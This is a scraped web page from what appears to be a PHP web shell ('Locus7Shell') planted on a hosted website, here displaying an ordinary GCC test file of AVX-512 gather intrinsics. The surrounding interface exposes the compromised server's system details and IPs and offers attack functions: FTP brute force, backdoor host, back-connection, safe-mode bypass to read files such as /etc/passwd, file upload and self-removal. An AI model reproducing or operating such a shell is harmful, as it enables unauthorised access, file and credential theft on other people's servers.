Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.target/i386/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     avx512vl-pr79299-2.c (5.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* PR target/79299 */
/* { dg-do assemble { target avx512vl } } */
/* { dg-require-effective-target masm_intel } */
/* { dg-options "-Ofast -mavx512vl -masm=intel" } */

#include <immintrin.h>

__m512
f1 (__m512i x, void const *y)
{
  return _mm512_i32gather_ps (x, y, 1);
}

__m512
f2 (__m512 x, __mmask16 y, __m512i z, void const *w)
{
  return _mm512_mask_i32gather_ps (x, y, z, w, 1);
}

__m512d
f3 (__m256i x, void const *y)
{
  return _mm512_i32gather_pd (x, y, 1);
}

__m512d
f4 (__m512d x, __mmask8 y, __m256i z, void const *w)
{
  return _mm512_mask_i32gather_pd (x, y, z, w, 1);
}

__m256
f5 (__m512i x, void const *y)
{
  return _mm512_i64gather_ps (x, y, 1);
}

__m256
f6 (__m256 x, __mmask16 y, __m512i z, void const *w)
{
  return _mm512_mask_i64gather_ps (x, y, z, w, 1);
}

__m512d
f7 (__m512i x, void const *y)
{
  return _mm512_i64gather_pd (x, y, 1);
}

__m512d
f8 (__m512d x, __mmask8 y, __m512i z, void const *w)
{
  return _mm512_mask_i64gather_pd (x, y, z, w, 1);
}

__m512i
f9 (__m512i x, void const *y)
{
  return _mm512_i32gather_epi32 (x, y, 1);
}

__m512i
f10 (__m512i x, __mmask16 y, __m512i z, void const *w)
{
  return _mm512_mask_i32gather_epi32 (x, y, z, w, 1);
}

__m512i
f11 (__m256i x, void const *y)
{
  return _mm512_i32gather_epi64 (x, y, 1);
}

__m512i
f12 (__m512i x, __mmask8 y, __m256i z, void const *w)
{
  return _mm512_mask_i32gather_epi64 (x, y, z, w, 1);
}

__m256i
f13 (__m512i x, void const *y)
{
  return _mm512_i64gather_epi32 (x, y, 1);
}

__m256i
f14 (__m256i x, __mmask16 y, __m512i z, void const *w)
{
  return _mm512_mask_i64gather_epi32 (x, y, z, w, 1);
}

__m512i
f15 (__m512i x, void const *y)
{
  return _mm512_i64gather_epi64 (x, y, 1);
}

__m512i
f16 (__m512i x, __mmask8 y, __m512i z, void const *w)
{
  return _mm512_mask_i64gather_epi64 (x, y, z, w, 1);
}

__m256
f17 (__m256 x, __mmask8 y, __m256i z, void const *w)
{
  return _mm256_mmask_i32gather_ps (x, y, z, w, 1);
}

__m128
f18 (__m128 x, __mmask8 y, __m128i z, void const *w)
{
  return _mm_mmask_i32gather_ps (x, y, z, w, 1);
}

__m256d
f19 (__m256d x, __mmask8 y, __m128i z, void const *w)
{
  return _mm256_mmask_i32gather_pd (x, y, z, w, 1);
}

__m128d
f20 (__m128d x, __mmask8 y, __m128i z, void const *w)
{
  return _mm_mmask_i32gather_pd (x, y, z, w, 1);
}

__m128
f21 (__m128 x, __mmask8 y, __m256i z, void const *w)
{
  return _mm256_mmask_i64gather_ps (x, y, z, w, 1);
}

__m128
f22 (__m128 x, __mmask8 y, __m128i z, void const *w)
{
  return _mm_mmask_i64gather_ps (x, y, z, w, 1);
}

__m256d
f23 (__m256d x, __mmask8 y, __m256i z, void const *w)
{
  return _mm256_mmask_i64gather_pd (x, y, z, w, 1);
}

__m128d
f24 (__m128d x, __mmask8 y, __m128i z, void const *w)
{
  return _mm_mmask_i64gather_pd (x, y, z, w, 1);
}

__m256i
f25 (__m256i x, __mmask8 y, __m256i z, void const *w)
{
  return _mm256_mmask_i32gather_epi32 (x, y, z, w, 1);
}

__m128i
f26 (__m128i x, __mmask8 y, __m128i z, void const *w)
{
  return _mm_mmask_i32gather_epi32 (x, y, z, w, 1);
}

__m256i
f27 (__m256i x, __mmask8 y, __m128i z, void const *w)
{
  return _mm256_mmask_i32gather_epi64 (x, y, z, w, 1);
}

__m128i
f28 (__m128i x, __mmask8 y, __m128i z, void const *w)
{
  return _mm_mmask_i32gather_epi64 (x, y, z, w, 1);
}

__m128i
f29 (__m128i x, __mmask8 y, __m256i z, void const *w)
{
  return _mm256_mmask_i64gather_epi32 (x, y, z, w, 1);
}

__m128i
f30 (__m128i x, __mmask8 y, __m128i z, void const *w)
{
  return _mm_mmask_i64gather_epi32 (x, y, z, w, 1);
}

__m256i
f31 (__m256i x, __mmask8 y, __m256i z, void const *w)
{
  return _mm256_mmask_i64gather_epi64 (x, y, z, w, 1);
}

__m128i
f32 (__m128i x, __mmask8 y, __m128i z, void const *w)
{
  return _mm_mmask_i64gather_epi64 (x, y, z, w, 1);
}

__m256
f33 (__m256 x, __m256i z, void const *w)
{
  return _mm256_mmask_i32gather_ps (x, -1, z, w, 1);
}

__m128
f34 (__m128 x, __m128i z, void const *w)
{
  return _mm_mmask_i32gather_ps (x, -1, z, w, 1);
}

__m256d
f35 (__m256d x, __m128i z, void const *w)
{
  return _mm256_mmask_i32gather_pd (x, -1, z, w, 1);
}

__m128d
f36 (__m128d x, __m128i z, void const *w)
{
  return _mm_mmask_i32gather_pd (x, -1, z, w, 1);
}

__m128
f37 (__m128 x, __m256i z, void const *w)
{
  return _mm256_mmask_i64gather_ps (x, -1, z, w, 1);
}

__m128
f38 (__m128 x, __m128i z, void const *w)
{
  return _mm_mmask_i64gather_ps (x, -1, z, w, 1);
}

__m256d
f39 (__m256d x, __m256i z, void const *w)
{
  return _mm256_mmask_i64gather_pd (x, -1, z, w, 1);
}

__m128d
f40 (__m128d x, __m128i z, void const *w)
{
  return _mm_mmask_i64gather_pd (x, -1, z, w, 1);
}

__m256i
f41 (__m256i x, __m256i z, void const *w)
{
  return _mm256_mmask_i32gather_epi32 (x, -1, z, w, 1);
}

__m128i
f42 (__m128i x, __m128i z, void const *w)
{
  return _mm_mmask_i32gather_epi32 (x, -1, z, w, 1);
}

__m256i
f43 (__m256i x, __m128i z, void const *w)
{
  return _mm256_mmask_i32gather_epi64 (x, -1, z, w, 1);
}

__m128i
f44 (__m128i x, __m128i z, void const *w)
{
  return _mm_mmask_i32gather_epi64 (x, -1, z, w, 1);
}

__m128i
f45 (__m128i x, __m256i z, void const *w)
{
  return _mm256_mmask_i64gather_epi32 (x, -1, z, w, 1);
}

__m128i
f46 (__m128i x, __m128i z, void const *w)
{
  return _mm_mmask_i64gather_epi32 (x, -1, z, w, 1);
}

__m256i
f47 (__m256i x, __m256i z, void const *w)
{
  return _mm256_mmask_i64gather_epi64 (x, -1, z, w, 1);
}

__m128i
f48 (__m128i x, __m128i z, void const *w)
{
  return _mm_mmask_i64gather_epi64 (x, -1, z, w, 1);
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0066 ]--